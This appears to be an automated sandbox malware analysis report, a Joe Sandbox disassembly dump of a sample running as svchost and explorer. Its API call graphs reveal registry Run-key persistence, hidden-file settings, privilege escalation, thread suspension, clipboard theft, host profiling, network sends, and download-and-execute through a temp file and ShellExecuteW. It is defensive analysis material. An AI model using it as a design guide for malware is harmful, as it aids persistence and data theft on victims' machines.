                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF7E52B3AB9
                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 00007FF7E52B3AC4
                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 00007FF7E52B3ADD
                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF7E52B3AF5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: Services
                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                  • Opcode ID: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
                                                                                                                                                                  • Instruction ID: 74b461e13fc68567b4c63897fbb98cac2732082def9488eff697fb992837867f
                                                                                                                                                                  • Opcode Fuzzy Hash: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1B0188A1A1858652DFA0EB24EC643AA9364FB98B44FD04033D24DC35A8EE3CD249CB11
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                  • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                  • Instruction ID: 6564cf23917d6a87b606184b7296d09634800162ee19dcede5aa38be54c2d556
                                                                                                                                                                  • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                  • Instruction Fuzzy Hash: E5014C76618A808ADB909F14F85471AB778F788B94F901226EB8D83B68DF7CC144CF11
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                  • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                  • Instruction ID: 6c6fa1464ff4f5b2fc11fb66302106246aadef941fdf2229d2bd956d9c47cad2
                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                  • Instruction Fuzzy Hash: A9116672528B4486DB909B14F85072AB7A4FB88BA0F505331F96E83BE8DF7CD144CB11
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                    • Part of subcall function 00007FF7E52B46E4: CreateFileW.KERNELBASE ref: 00007FF7E52B472B
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B4249
                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF7E52B3037
                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF7E52B304A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                  • API String ID: 3992431006-2286007224
                                                                                                                                                                  • Opcode ID: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
                                                                                                                                                                  • Instruction ID: 651a06c44d721a237996f569c9899331d2e0da680c1933684e6e31ab98354fb5
                                                                                                                                                                  • Opcode Fuzzy Hash: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
                                                                                                                                                                  • Instruction Fuzzy Hash: 41110DA0918A8A85EB90FB10EC643A5B7A8FB8CB04F844136D58CD3665DF3CE0458762

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                  Signature Coverage:10.9%
                                                                                                                                                                  Total number of Nodes:396
                                                                                                                                                                  Total number of Limit Nodes:17
                                                                                                                                                                  execution_graph 39906 9828aa0 39913 98288b0 39906->39913 39908 9828b23 39909 9828ae0 OpenThread 39910 9828acc _close_nolock 39909->39910 39911 9828afc SuspendThread 39909->39911 39910->39908 39910->39909 39921 9828ea0 39911->39921 39920 98288d6 _CRT_INIT realloc _DllMainCRTStartup 39913->39920 39914 98289ad _close_nolock 39925 983e010 39914->39925 39916 98289c3 39916->39910 39917 9828990 Thread32Next 39917->39914 39917->39920 39918 982892b HeapAlloc 39918->39914 39919 982894f 39918->39919 39919->39920 39920->39914 39920->39917 39920->39918 39924 9828eda _DllMainCRTStartup 39921->39924 39922 983e010 _atodbl_l 3 API calls 39923 9828fd3 39922->39923 39923->39910 39924->39922 39926 983e019 39925->39926 39927 983e024 39926->39927 39928 983e574 IsProcessorFeaturePresent 39926->39928 39927->39916 39929 983e58b 39928->39929 39932 9844e48 RtlCaptureContext RtlLookupFunctionEntry __crtCaptureCurrentContext 39929->39932 39931 983e59e 39931->39916 39932->39931 39933 9828750 39934 9828781 _DllMainCRTStartup 39933->39934 39935 98287a4 39934->39935 39936 982880f FlushInstructionCache 39934->39936 39936->39935 39937 9828b50 39941 9828b7a _DllMainCRTStartup 39937->39941 39938 9828ca2 _DllMainCRTStartup 39939 983e010 _atodbl_l 3 API calls 39938->39939 39940 9828cd2 39939->39940 39941->39938 39953 9827930 39941->39953 39945 9828be2 39946 9828c95 39945->39946 39947 9828bea 39945->39947 39959 9827a90 VirtualFree VirtualFree 39946->39959 39957 98284d0 HeapAlloc realloc 39947->39957 39950 9828bef 39952 9828bfb 39950->39952 39958 9827a90 VirtualFree VirtualFree 39950->39958 39952->39938 39960 9827b10 GetSystemInfo 39953->39960 39955 9827939 39955->39938 39956 9829060 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry _atodbl_l _DllMainCRTStartup 39955->39956 39956->39945 39957->39950 39958->39952 39959->39938 39961 9827b45 _DllMainCRTStartup 39960->39961 39961->39955 39962 9828fe0 39963 982904f 39962->39963 39964 9828fef _close_nolock 39962->39964 39965 9829038 HeapFree 39964->39965 39966 9829000 OpenThread 39964->39966 39968 9829033 39964->39968 39965->39963 39966->39964 39967 982901a ResumeThread 39966->39967 39967->39964 39968->39965 39969 98217f0 40014 9822660 39969->40014 39971 9821865 39972 9822660 45 API calls 39971->39972 39973 9821870 39972->39973 40023 983d70c 39973->40023 39976 9821891 lstrcpyA 39977 982189d _ioinit0 39976->39977 39978 98218ba SHGetFolderPathA lstrcatA lstrcatA PathFileExistsA lstrcmpiA 39977->39978 39979 98219a1 lstrcatA 39978->39979 39980 9821929 lstrcmpiA 39978->39980 39981 98219be lstrcmpiA lstrcmpiA 39979->39981 39980->39979 39982 982193d lstrcmpiA 39980->39982 39983 98219f1 39981->39983 39984 98219ec _DllMainCRTStartup 39981->39984 39982->39979 39985 9821951 lstrcmpiA 39982->39985 39983->39984 39987 9821a1b 39983->39987 39990 98219fe CreateThread 39984->39990 39985->39979 39986 9821965 lstrcmpiA 39985->39986 39986->39979 39988 9821979 lstrcmpiA 39986->39988 40040 9822720 39987->40040 39988->39979 39989 982198d lstrcmpiA 39988->39989 39989->39979 39989->39981 39990->39987 39992 9821c1d 40051 983d6cc 43 API calls 3 library calls 39992->40051 39993 9821a33 39993->39992 39994 9821aa5 39993->39994 40004 9821ac6 _ioinit0 _DllMainCRTStartup 39994->40004 40049 98217a0 GetNativeSystemInfo IsWow64Process 39994->40049 39996 9821c25 40052 983d6cc 43 API calls 3 library calls 39996->40052 39999 9821ab4 40001 9821ad3 TerminateProcess 39999->40001 40002 9821ab8 39999->40002 40000 9821c2d 40053 983d6cc 43 API calls 3 library calls 40000->40053 40001->40004 40050 9821370 50 API calls 6 library calls 40002->40050 40007 9821b14 CreateFileA WriteFile WriteFile 40004->40007 40006 9821c35 40054 983d6cc 43 API calls 3 library calls 40006->40054 40009 9821c14 _close_nolock 40007->40009 40010 9821b8c 6 API calls 40007->40010 40009->39992 40010->40009 40011 9821c3e 40012 983e010 _atodbl_l 3 API calls 40011->40012 40013 9821c50 40012->40013 40015 9822676 WideCharToMultiByte 40014->40015 40016 982266e 40014->40016 40017 98226c1 40015->40017 40018 98226af 40015->40018 40016->39971 40019 983d70c malloc 43 API calls 40017->40019 40018->39971 40020 98226d0 40019->40020 40021 9822702 40020->40021 40022 98226d8 WideCharToMultiByte 40020->40022 40021->39971 40022->40021 40024 983d7a0 40023->40024 40036 983d724 40023->40036 40061 9840d88 DecodePointer 40024->40061 40026 983d75c HeapAlloc 40026->40036 40039 982187d PathFindFileNameA 40026->40039 40027 983d73c 40027->40026 40055 98408b4 43 API calls 2 library calls 40027->40055 40056 9840928 43 API calls 7 library calls 40027->40056 40057 9840e08 GetProcAddress ExitProcess __crtCorExitProcess 40027->40057 40028 983d7a5 40062 983f4b0 43 API calls _getptd_noexit 40028->40062 40031 983d785 40059 983f4b0 43 API calls _getptd_noexit 40031->40059 40035 983d78a 40060 983f4b0 43 API calls _getptd_noexit 40035->40060 40036->40026 40036->40027 40036->40031 40036->40035 40058 9840d88 DecodePointer 40036->40058 40039->39976 40039->39977 40041 9822734 MultiByteToWideChar 40040->40041 40042 98227bd 40040->40042 40043 9822769 40041->40043 40044 982275c 40041->40044 40042->39993 40045 983d70c malloc 43 API calls 40043->40045 40044->39993 40046 982277b 40045->40046 40047 9822793 MultiByteToWideChar 40046->40047 40048 9822783 40046->40048 40047->40042 40048->39993 40049->39999 40050->40004 40051->39996 40052->40000 40053->40006 40054->40011 40055->40027 40056->40027 40058->40036 40059->40035 40060->40039 40061->40028 40062->40039 40063 983efb0 40064 983efcc 40063->40064 40069 983efd1 40063->40069 40077 984671c GetSystemTimeAsFileTime GetTickCount64 GetTickCount64 QueryPerformanceCounter _CRT_INIT 40064->40077 40066 983f05c 40074 983f026 40066->40074 40079 983b5d0 40066->40079 40068 983f07a 40070 983f0a3 40068->40070 40072 983b5d0 _DllMainCRTStartup 247 API calls 40068->40072 40069->40066 40069->40074 40078 983ee58 75 API calls 15 library calls 40069->40078 40070->40074 40089 983ee58 75 API calls 15 library calls 40070->40089 40075 983f096 40072->40075 40088 983ee58 75 API calls 15 library calls 40075->40088 40077->40069 40078->40066 40080 983b5f0 _DllMainCRTStartup 40079->40080 40081 983b5d8 40079->40081 40138 9828e20 14 API calls _DllMainCRTStartup 40080->40138 40082 983b5fc 40081->40082 40090 9825590 LoadLibraryA GetProcAddress 40081->40090 40082->40068 40088->40070 40089->40074 40091 982619d 13 API calls 40090->40091 40092 98262a3 _DllMainCRTStartup 40091->40092 40139 982f540 40092->40139 40094 9827173 40095 982f540 _DllMainCRTStartup 2 API calls 40094->40095 40096 9827186 40095->40096 40097 982f540 _DllMainCRTStartup 2 API calls 40096->40097 40098 9827199 40097->40098 40099 982f540 _DllMainCRTStartup 2 API calls 40098->40099 40100 98271ac 40099->40100 40101 982f540 _DllMainCRTStartup 2 API calls 40100->40101 40102 98271bf 40101->40102 40103 982f540 _DllMainCRTStartup 2 API calls 40102->40103 40104 98271d2 40103->40104 40105 983b410 40104->40105 40146 98350a0 40105->40146 40108 983b4bd lstrcmpiA 40111 983b4db lstrcmpiA 40108->40111 40113 983b4d1 _DllMainCRTStartup 40108->40113 40109 983b47d 40148 983b3c0 CreateMutexA 40109->40148 40114 983b4fb lstrcmpiA 40111->40114 40115 983b4ef _DllMainCRTStartup 40111->40115 40112 983b489 _DllMainCRTStartup 40112->40108 40122 983b492 CreateThread 40112->40122 40168 983a160 72 API calls _DllMainCRTStartup 40113->40168 40116 983b50f _DllMainCRTStartup 40114->40116 40117 983b51e lstrcmpiA 40114->40117 40169 98398c0 157 API calls 3 library calls 40115->40169 40170 98398c0 157 API calls 3 library calls 40116->40170 40118 983b532 _DllMainCRTStartup 40117->40118 40119 983b541 lstrcmpiA 40117->40119 40171 98398c0 157 API calls 3 library calls 40118->40171 40123 983b555 _DllMainCRTStartup 40119->40123 40124 983b564 lstrcmpiA 40119->40124 40150 9821c70 40122->40150 40351 9837540 40122->40351 40172 98398c0 157 API calls 3 library calls 40123->40172 40125 983b589 CreateThread 40124->40125 40126 983b578 _DllMainCRTStartup 40124->40126 40130 983b5aa 40125->40130 40173 98398c0 157 API calls 3 library calls 40126->40173 40134 983e010 _atodbl_l 3 API calls 40130->40134 40136 983b5bc 40134->40136 40136->40068 40137 983b587 40137->40130 40138->40082 40140 982f554 MultiByteToWideChar 40139->40140 40141 982f5dd 40139->40141 40142 982f57c 40140->40142 40143 982f589 40140->40143 40141->40094 40142->40094 40144 982f5b3 MultiByteToWideChar 40143->40144 40145 982f5a3 40143->40145 40144->40141 40145->40094 40147 98350ac GetModuleFileNameA PathFindFileNameA lstrcmpiA 40146->40147 40147->40108 40147->40109 40149 983b3de _wcstombs_l_helper _close_nolock 40148->40149 40149->40112 40174 982f170 40150->40174 40154 9821cab _DllMainCRTStartup 40196 9828db0 40154->40196 40156 9821cc8 40201 9828ce0 GetProcAddress _DllMainCRTStartup 40156->40201 40158 9821ce9 40202 9828ce0 GetProcAddress _DllMainCRTStartup 40158->40202 40160 9821d0a _DllMainCRTStartup 40161 983e010 _atodbl_l 3 API calls 40160->40161 40162 9821d23 40161->40162 40163 9835710 40162->40163 40211 9835570 40163->40211 40169->40114 40170->40117 40171->40119 40172->40124 40173->40137 40203 982f040 40174->40203 40176 982f1c4 _DllMainCRTStartup 40177 982f1db lstrcatW lstrcatW CreateDirectoryW 40176->40177 40208 9850200 40177->40208 40179 982f212 lstrcatW lstrcatW lstrcatW 40180 983e010 _atodbl_l IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry 40179->40180 40181 9821c93 40180->40181 40182 982f2e0 CreateFileW 40181->40182 40183 982f323 40182->40183 40184 982f330 GetFileSize 40182->40184 40183->40154 40209 9850058 40184->40209 40186 982f356 HeapAlloc 40187 982f372 ReadFile 40186->40187 40191 982f3b0 _close_nolock 40186->40191 40188 982f399 _heap_init 40187->40188 40189 982f38f 40187->40189 40190 982f39f HeapFree 40188->40190 40189->40188 40192 982f3bd _DllMainCRTStartup 40189->40192 40190->40191 40191->40154 40192->40191 40193 982f401 _heap_init 40192->40193 40194 982f417 HeapAlloc 40193->40194 40194->40191 40195 982f430 __init_ctype 40194->40195 40195->40191 40197 9828dbd _DllMainCRTStartup 40196->40197 40198 9828e03 _DllMainCRTStartup 40197->40198 40199 9828dc6 HeapCreate 40197->40199 40198->40156 40200 9828ddf _DllMainCRTStartup 40199->40200 40200->40156 40201->40158 40202->40160 40204 982f099 _DllMainCRTStartup 40203->40204 40205 982f127 wsprintfW 40204->40205 40206 983e010 _atodbl_l 3 API calls 40205->40206 40207 982f15b 40206->40207 40207->40176 40210 985005f 40209->40210 40212 98355b5 _ioinit0 40211->40212 40213 983561d GetUserNameW GetComputerNameW 40212->40213 40236 982f480 40213->40236 40215 9835655 40216 982f480 _DllMainCRTStartup 3 API calls 40215->40216 40217 9835664 GetNativeSystemInfo GetVersionExA 40216->40217 40218 98356d3 _DllMainCRTStartup 40217->40218 40243 9829450 40218->40243 40221 983e010 _atodbl_l 3 API calls 40222 98356f6 40221->40222 40223 98350d0 40222->40223 40224 9835100 lstrcpyA 40223->40224 40225 9829450 _DllMainCRTStartup 42 API calls 40224->40225 40229 9835141 _DllMainCRTStartup 40225->40229 40226 98351c7 free 40332 9860868 40226->40332 40228 98351db SleepEx 40229->40226 40230 9835170 StrChrA 40229->40230 40231 9835160 40229->40231 40234 9835191 _DllMainCRTStartup 40230->40234 40232 9835570 _DllMainCRTStartup 50 API calls 40231->40232 40233 9835165 40232->40233 40233->40226 40234->40226 40234->40230 40322 9835450 40234->40322 40237 982f496 WideCharToMultiByte 40236->40237 40238 982f48e 40236->40238 40239 982f4e1 malloc 40237->40239 40240 982f4cf 40237->40240 40238->40215 40241 982f522 40239->40241 40242 982f4f8 WideCharToMultiByte 40239->40242 40240->40215 40241->40215 40242->40241 40244 98295aa memcpy lstrlenA 40243->40244 40248 982948d __lock_fhandle _DllMainCRTStartup 40243->40248 40269 982f260 40244->40269 40249 98294ab lstrcpyA 40248->40249 40263 982ef20 40249->40263 40250 982962a 40253 982f260 _DllMainCRTStartup lstrlenA 40250->40253 40255 982963f 40253->40255 40254 98272c0 _DllMainCRTStartup 34 API calls 40261 982955c 40254->40261 40259 983e010 _atodbl_l 3 API calls 40255->40259 40256 98295f1 40256->40250 40257 98272c0 _DllMainCRTStartup 34 API calls 40256->40257 40257->40256 40258 982958f _mtinitlocknum 40258->40244 40260 9829664 free 40259->40260 40260->40221 40261->40258 40262 98272c0 _DllMainCRTStartup 34 API calls 40261->40262 40262->40261 40316 9850208 40263->40316 40265 982ef72 GetVolumeInformationA 40266 982efc6 _DllMainCRTStartup 40265->40266 40267 983e010 _atodbl_l IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry 40266->40267 40268 98294ec lstrcpyA lstrcatA lstrcatA 40267->40268 40268->40254 40270 982f264 40269->40270 40271 98295e7 40269->40271 40272 982f282 lstrlenA 40270->40272 40273 98272c0 40271->40273 40272->40271 40272->40272 40274 98350a0 _ioinit0 40273->40274 40275 9827303 6 API calls 40274->40275 40276 98273e0 lstrcatA WSAStartup 40275->40276 40277 9827386 40275->40277 40282 9827434 _DllMainCRTStartup 40276->40282 40304 9827870 _DllMainCRTStartup 40276->40304 40277->40276 40278 982738c lstrcatA 40277->40278 40318 9860718 40278->40318 40281 98278bf free 40283 98278cb closesocket WSACleanup 40281->40283 40286 9827468 memcpy htons 40282->40286 40282->40304 40284 983e010 _atodbl_l 3 API calls 40283->40284 40285 9827914 40284->40285 40285->40256 40287 98274a5 _DllMainCRTStartup 40286->40287 40288 98274ae lstrlenA send 40287->40288 40287->40304 40289 98274d9 40288->40289 40288->40304 40290 98274e2 send 40289->40290 40307 98274fa _ioinit0 _DllMainCRTStartup 40289->40307 40290->40304 40290->40307 40291 9827925 40321 983e648 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry __report_securityfailure 40291->40321 40292 98275a5 lstrcmpiA 40292->40304 40292->40307 40293 98275ca lstrlenA 40295 9827699 40293->40295 40293->40307 40297 98276a2 40295->40297 40299 98276b4 malloc 40295->40299 40300 982784c 40295->40300 40296 982792a 40298 98276aa 40297->40298 40297->40304 40298->40299 40314 98276f0 _DllMainCRTStartup 40299->40314 40301 9827851 malloc 40300->40301 40302 982789c malloc 40300->40302 40301->40304 40302->40283 40303 98275fd lstrcmpiA 40305 982763e lstrcmpiA 40303->40305 40303->40307 40304->40281 40308 9827894 40304->40308 40306 9827652 lstrcmpiA 40305->40306 40305->40307 40306->40307 40307->40291 40307->40292 40307->40293 40307->40303 40307->40304 40308->40283 40309 9827830 40309->40281 40310 982791f 40320 983e648 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry __report_securityfailure 40310->40320 40312 9827924 40312->40291 40313 9827835 40313->40283 40314->40281 40314->40309 40314->40310 40314->40313 40315 982779a realloc 40314->40315 40315->40314 40317 9850210 40316->40317 40319 986071f 40318->40319 40320->40312 40321->40296 40323 9835514 _ioinit0 40322->40323 40325 983547a _ioinit0 40322->40325 40326 98351e0 _DllMainCRTStartup 48 API calls 40323->40326 40324 983e010 _atodbl_l 3 API calls 40327 9835551 40324->40327 40331 98354dd _DllMainCRTStartup 40325->40331 40334 98351e0 40325->40334 40326->40331 40327->40234 40330 982f170 _DllMainCRTStartup 10 API calls 40330->40331 40331->40324 40333 986088f 40332->40333 40335 9835227 _ioinit0 40334->40335 40336 983525e lstrlenA InternetCrackUrlA 40335->40336 40338 98352a5 _ioinit0 40336->40338 40350 98353d9 40336->40350 40337 983e010 _atodbl_l 3 API calls 40339 983542d 40337->40339 40340 98272c0 _DllMainCRTStartup 34 API calls 40338->40340 40338->40350 40339->40330 40339->40331 40343 98352eb _DllMainCRTStartup 40340->40343 40341 9835411 free 40341->40350 40342 982f540 _DllMainCRTStartup 2 API calls 40344 9835316 _DllMainCRTStartup 40342->40344 40343->40341 40343->40342 40344->40341 40345 983533c GetTempFileNameW lstrcatW lstrcatW CreateFileW 40344->40345 40345->40341 40346 983539f WriteFile 40345->40346 40347 98353c0 free CloseHandle 40346->40347 40348 9835408 CloseHandle 40346->40348 40349 98353e0 ShellExecuteW 40347->40349 40347->40350 40348->40341 40349->40348 40349->40350 40350->40337 40359 983756a _realloc_crt _DllMainCRTStartup 40351->40359 40353 9822c20 76 API calls _DllMainCRTStartup 40360 98375a8 _DllMainCRTStartup 40353->40360 40354 9837c90 45 API calls 40354->40360 40355 9822c20 76 API calls _DllMainCRTStartup 40355->40359 40356 9837ce0 7 API calls 40356->40360 40357 9837c20 45 API calls 40357->40359 40358 9821100 45 API calls _DllMainCRTStartup 40358->40360 40359->40355 40359->40357 40359->40360 40361 9837af0 OpenClipboard 40359->40361 40360->40353 40360->40354 40360->40356 40360->40358 40360->40359 40362 9837b64 40361->40362 40363 9837b0b GetClipboardData 40361->40363 40373 9822c20 40362->40373 40365 9837b21 GlobalLock 40363->40365 40366 9837b3b CloseClipboard 40363->40366 40365->40366 40368 9837b2f GlobalUnlock 40365->40368 40366->40362 40369 9837b4b 40366->40369 40368->40366 40372 9821100 45 API calls _DllMainCRTStartup 40369->40372 40371 9837b56 40371->40359 40372->40371 40374 9822c3d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 40373->40374 40377 9822080 40374->40377 40376 9822c74 40376->40359 40378 98220a9 _DllMainCRTStartup 40377->40378 40379 98220b2 _DllMainCRTStartup 40378->40379 40380 9822146 40378->40380 40383 98220d4 40379->40383 40384 98220ec 40379->40384 40393 9822040 45 API calls _DllMainCRTStartup 40380->40393 40390 98223f0 76 API calls 2 library calls 40383->40390 40392 9821e90 45 API calls _DllMainCRTStartup 40384->40392 40387 98220dd 40391 9822370 76 API calls 2 library calls 40387->40391 40389 98220ea char_traits _DllMainCRTStartup 40389->40376 40390->40387 40391->40389 40392->40389

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
